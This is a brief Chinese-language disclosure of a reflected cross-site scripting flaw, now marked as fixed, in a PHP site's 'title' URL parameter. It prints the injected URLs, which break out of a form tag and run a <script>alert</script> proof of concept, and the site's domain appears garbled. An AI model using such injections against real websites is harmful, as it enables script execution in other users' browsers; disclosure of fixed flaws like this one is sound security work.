Author:H3art Data:Jan 19,2013 地址:http://HdhCmsTest2cto测试数据/uapi.php?tid=183269&catid=19&title= 下面我们在title= 后面输入 h3art 地址变成http://HdhCmsTest2cto测试数据/uapi.php?tid=183269&catid=19&title=h3art 查看 源码 刚才输入的h3art"> 封闭了前面的<form 然后后面的[method="post".........name="myf"> 就在页面上显示了出来 下面接着输入<script>alert("H3art")</script> 地址变成http://HdhCmsTest2cto测试数据/uapi.php?tid=183269&catid=19&title=h3art[><script>alert("H3art")</script> 查看源码 输入 <input name="xss 地址变成http://HdhCmsTest2cto测试数据/uapi.php?tid=183269&catid=19&title=h3art[><script>alert("H3art")</script><input name="xss 查看源码
查看更多关于自学php(2cto.com)XSS[已修复] - 网站安全 - 自学php的详细内容...